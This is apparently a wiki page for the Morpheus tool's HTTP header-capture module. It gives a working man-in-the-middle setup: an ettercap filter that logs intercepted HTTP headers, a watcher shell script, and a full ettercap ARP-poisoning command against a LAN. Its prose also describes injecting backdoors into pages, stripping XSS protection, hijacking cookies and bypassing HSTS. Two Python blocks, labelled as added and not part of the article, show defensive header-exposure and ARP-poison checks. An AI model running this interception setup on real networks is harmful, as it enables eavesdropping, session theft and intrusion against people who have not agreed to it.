
HTTP tcp Header Information Gathering Module

pedro ubuntu edited this page Jan 5, 2019 · 47 revisions

Article Glossary

[1] A little history about this module (development, objectives, info)
[2] Step by step: how to use the Morpheus tool to capture HTTP headers
[3] Reverse engineering the Morpheus HTTP header capture module




Definition - What does HTTP Header mean?

HTTP headers are the name/value pairs that appear in the message headers of Hypertext Transfer Protocol (HTTP) requests and responses. The header name and its value are separated by a single colon. HTTP headers are an integral part of HTTP requests and responses. In simpler terms, HTTP headers are the metadata that accompanies data transferred between a web server and a browser.


Why capture target HTTP tcp Headers?

Some headers influence how the browser behaves, for example instructing it not to store the page in its local cache (Cache-Control). Others reveal client and server IP address(es), domain names, DNS records, the languages the target browser accepts (Accept-Language), proxy IP address(es), authentication cookies, etc. The User-Agent string also tells us which browser is in use, its version, the operating system of the target machine, and so on.


In what scenario is this kind of information useful?

This kind of information gathering before any exploitation technique is attempted (pre-exploitation reconnaissance) can be useful in revealing the browser version installed on the target, which could lead to an entry point into the target system. Suppose the target browser in use is Firefox/52.0: with that information in hand, the attacker knows that the target browser is vulnerable to all exploits for Firefox from version 52.0 up to the current Firefox version, 63.0.3. It also provides a simple way to learn which operating system the target uses, before sending a payload of the wrong architecture that the agent will not execute. Recon is an important step before the actual exploitation occurs.
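To make the exposure concrete from the defender's side, here is an added example (not code from Morpheus or this article) that parses a constructed cleartext HTTP request into name/value pairs and reports what a passive observer on the path learns from it: the site visited, browser and version from User-Agent, an OS hint, accepted languages, and which secret-bearing headers (Cookie, Authorization) travelled unencrypted. The sample request and the SENSITIVE set are assumptions of the example.

```python
"""Added example (not part of Morpheus or this article): parse a cleartext
HTTP request captured on port 80 and report what a passive observer learns."""
import re

# Constructed sample request, as it would travel unencrypted over port 80.
SAMPLE_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) "
    b"Gecko/20100101 Firefox/52.0\r\n"
    b"Accept-Language: pt-PT,pt;q=0.8,en;q=0.5\r\n"
    b"Cookie: PHPSESSID=constructedsessionid0123\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
)

# Header names whose exposure on a plaintext link is worth flagging.
SENSITIVE = {"cookie", "authorization", "proxy-authorization"}

def parse_headers(raw: bytes) -> dict:
    """Return {name.lower(): value} from the header block of an HTTP message."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:             # lines[0] is the request/status line
        name, sep, value = line.partition(":")
        if sep:                        # skip malformed lines without a colon
            headers[name.strip().lower()] = value.strip()
    return headers

def exposure_report(headers: dict) -> dict:
    """Summarise what a man-in-the-middle learns from the parsed headers."""
    ua = headers.get("user-agent", "")
    browser = re.search(r"(Firefox|Chrome|Safari|Edge)/(\d+(?:\.\d+)*)", ua)
    os_hint = re.search(r"\((?:X11; )?([^;)]+)", ua)   # text inside the UA parens
    langs = headers.get("accept-language", "").split(",")
    return {
        "host": headers.get("host"),
        "browser": browser.group(1) if browser else None,
        "browser_version": browser.group(2) if browser else None,
        "os_hint": os_hint.group(1).strip() if os_hint else None,
        "languages": [p.split(";")[0].strip() for p in langs if p.strip()],
        "leaked_secrets": sorted(h for h in headers if h in SENSITIVE),
    }

if __name__ == "__main__":
    for key, val in exposure_report(parse_headers(SAMPLE_REQUEST)).items():
        print(f"{key:16}: {val}")
```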


How does the Morpheus tool actually capture target HTTP tcp headers?

Morpheus uses ettercap (the backend application) ARP poisoning to redirect the target's tcp traffic through the attacker machine (MITM). An ettercap filter (written by me) then regex-searches the captured packets for the header strings, displays them in real time (as they are captured) in the Morpheus terminal window, and triggers a warning sound on every capture (if configured). Finally, all captures are stored in the attacker's ../morpheus/logs folder for later review.

further reading:


Is any kind of 'on the fly' exploitation possible using Morpheus?

Yes... but NOT using the Morpheus 'HTTP tcp Header information gathering' module (the one that triggered the writing of this article). In some scenarios it is possible (with the help of an ettercap filter) to capture a target tcp packet before it arrives at the target machine and inject backdoors into the HTML [body] tags, or to instruct the target browser on the fly not to use its XSS protection mechanism, by using the replace() ettercap filter syntax to change the XSS header value from protecting the user to turning that setting off. Another scenario would be capturing the target's auth cookies and authenticating the attacker to the website being visited, using the cookie hijacking technique.

Some examples:

Is it possible to stop this kind of attack from occurring?

Yes. Software that protects the ARP cache locally and prevents man-in-the-middle (MITM) attacks, or recent browser security mechanisms like HSTS or the HTTPS Everywhere plug-in, etc., can prevent this type of attack from happening.
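The local ARP-cache protection mentioned above boils down to a few checks on incoming ARP replies. The following is an added example (not Morpheus code, and not any particular product's logic) that runs those checks over a constructed stream of (ip, mac) replies in which one station takes over both the gateway and a victim, the pattern an ARP poison produces on the wire; the addresses and the pinned gateway entry are assumptions of the example.

```python
"""Added example (not Morpheus code): flag the symptoms of ARP poisoning in
a stream of ARP replies, the check that local ARP-cache protection tools do."""
from collections import defaultdict

# Constructed ARP replies (ip, mac) as a sniffer on the LAN would deliver them.
# The gateway 192.168.1.1 is first seen at its real MAC; then one station at
# 00:11:22:33:44:55 claims both the gateway and the victim 192.168.1.71,
# which is how an ARP poison between victim and gateway looks from the wire.
SAMPLE_REPLIES = [
    ("192.168.1.1",  "aa:bb:cc:00:00:01"),
    ("192.168.1.71", "aa:bb:cc:00:00:47"),
    ("192.168.1.1",  "00:11:22:33:44:55"),   # gateway MAC changed
    ("192.168.1.71", "00:11:22:33:44:55"),   # same MAC now also claims the victim
    ("192.168.1.1",  "00:11:22:33:44:55"),   # repeat of an already-known binding
]

def detect_arp_poison(replies, pinned=None):
    """Return alert strings. `pinned` maps ip -> MAC for static entries (e.g.
    the gateway); a reply contradicting a pinned entry is rejected outright."""
    pinned = {ip: m.lower() for ip, m in (pinned or {}).items()}
    cache = {}                       # ip -> mac, what the host's ARP table holds
    ips_by_mac = defaultdict(set)    # mac -> set of ips it has claimed
    alerts = []
    for ip, mac in replies:
        mac = mac.lower()
        if ip in pinned and pinned[ip] != mac:
            alerts.append(f"reply for pinned {ip} from {mac}, expected {pinned[ip]}")
            continue                 # do not let it overwrite the cache
        old = cache.get(ip)
        if old is not None and old != mac:
            alerts.append(f"MAC change for {ip}: {old} -> {mac}")
        cache[ip] = mac
        if ip not in ips_by_mac[mac]:
            ips_by_mac[mac].add(ip)
            if len(ips_by_mac[mac]) > 1:
                claimed = ", ".join(sorted(ips_by_mac[mac]))
                alerts.append(f"{mac} claims multiple IPs: {claimed}")
    return alerts

if __name__ == "__main__":
    for line in detect_arp_poison(SAMPLE_REPLIES):
        print("ALERT:", line)
```

With the gateway pinned, the poisoned replies for it are rejected before they can change the cache, which is the behaviour a static ARP entry gives you.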


Can these techniques be reproduced under HTTPS?

Yes, with the help of external programs such as sslstrip+ (by Leonardo Nve), which has the ability to bypass the HSTS browser security mechanism and capture/decode HTTPS traffic through a proxy (dns2proxy can be used for that purpose), or the MITMf framework. But Morpheus by default does NOT implement these techniques. Why? Because the Morpheus tool was not written to be an 'attack' framework; its objective is to put its users in control of manipulating tcp/udp traffic on the fly with the help of ettercap filters (all options in the main menu are examples of how to script on the fly).






Step-by-step: how to use Morpheus to capture HTTP headers


The logfile for this article can be reviewed here:

HTTP tcp Headers Information Gathering - video tutorial

video tutorial






Reverse engineering the Morpheus module

  • The filter ( /root/morpheus/filters/IG.eft )
    https://github.com/r00t-3xp10it/morpheus/blob/master/filters/IG.eft

    # if ip.source = target ip addr (from source ip)
    if (ip.src == '192.168.1.71') {

      # if ip.protocol = tcp AND (tcp.destination = port 80 OR tcp.source = port 80)
      # the OR is grouped so that the protocol check applies to both port tests
      if (ip.proto == TCP && (tcp.dst == 80 || tcp.src == 80)) {
        msg("[morpheus] host:192.168.1.71   [ ⊶  ]  port:80   [tcp] http ☆");

          # regex search for the string: 'Host' inside the decoded tcp payload
          if (regex(DECODED.data, ".*Host.*")) {
            msg("\n[morpheus] host:192.168.1.71   header:found");
            msg("[morpheus] | status  : Target tcp header detected");
            msg("[morpheus] |_ header : Host string found ✔\n");

            # ettercap API to write the decoded payload into a local logfile
            log(DECODED.data, "./IG.log");
          }
      }
    }
    
  • Compiling the filter to be used in ettercap

    etterfilter /root/IG.eft -o /root/IG.ef
    

  • The auxiliary script ( /root/morpheus/bin/IG.sh )
    https://github.com/r00t-3xp10it/morpheus/blob/master/bin/IG.sh

    #!/bin/sh
    # Morpheus auxiliary script: watches for the IG.log file written by the
    # IG.eft ettercap filter and prints (optionally beeping on) each capture.
    printf "Be alerted by a BEEP on every <header> capture? (y/n): "
    read op
    if [ "$op" = "y" ] || [ "$op" = "yes" ]; then
      # Pick one of the desktop alert sounds (*.ogg) to use as the beep
      OGG=$(locate .ogg | grep "default/alerts" | head -3 | tail -1)
      warn=yes
    else
      warn=no
    fi

    # Start of the loop ..
    # Every time IG.log is written it triggers the warning and the display.
    while :
    do

      # check for logfile presence to trigger the display ..
      if [ -e /root/IG.log ]; then
        hour=$(date | awk '{print $4,$5,$6}')
        echo "" && echo "Tcp header capture"
        echo "Hour/Time: $hour"

        # Play the alert sound (paplay) if configured ..
        if [ "$warn" = "yes" ]; then
          paplay "$OGG"
        fi

        # Parse the first Host: header from the captured data in IG.log ..
        HST=$(grep -m 1 "Host:" /root/IG.log 2>/dev/null | awk '{print $2}')
        # Print the captured headers on screen ..
        sleep 0.8
        echo "------------------------------------------------"
        echo "Host                : $HST"
        echo "------------------------------------------------"

        # delete the temp logfile so the next capture triggers a new alert/display
        rm -f /root/IG.log > /dev/null 2>&1
        sleep 1.3
      fi

    # end loop
    done
    exit
    

  • Configure ettercap privileges in etter.conf

    nano /etc/ettercap/etter.conf
    


  • Ettercap (ARP-poison) + Filter (IG.eft) + Auxiliary (IG.sh)

    xterm -T "http tcp header info gathering" -geometry 109x27 -e "cd /root && ./IG.sh" & ettercap -T -Q -i wlan0 -F /root/IG.ef -M ARP /// ///
    

  • How to use your browser's search engine (Google) to find HTTP websites

    inurl:http://
    

Some examples:






Useful Links:

Special Thanks: shanty damayanti (my geek wife)

SuspiciousShellActivity - RedTeam @2018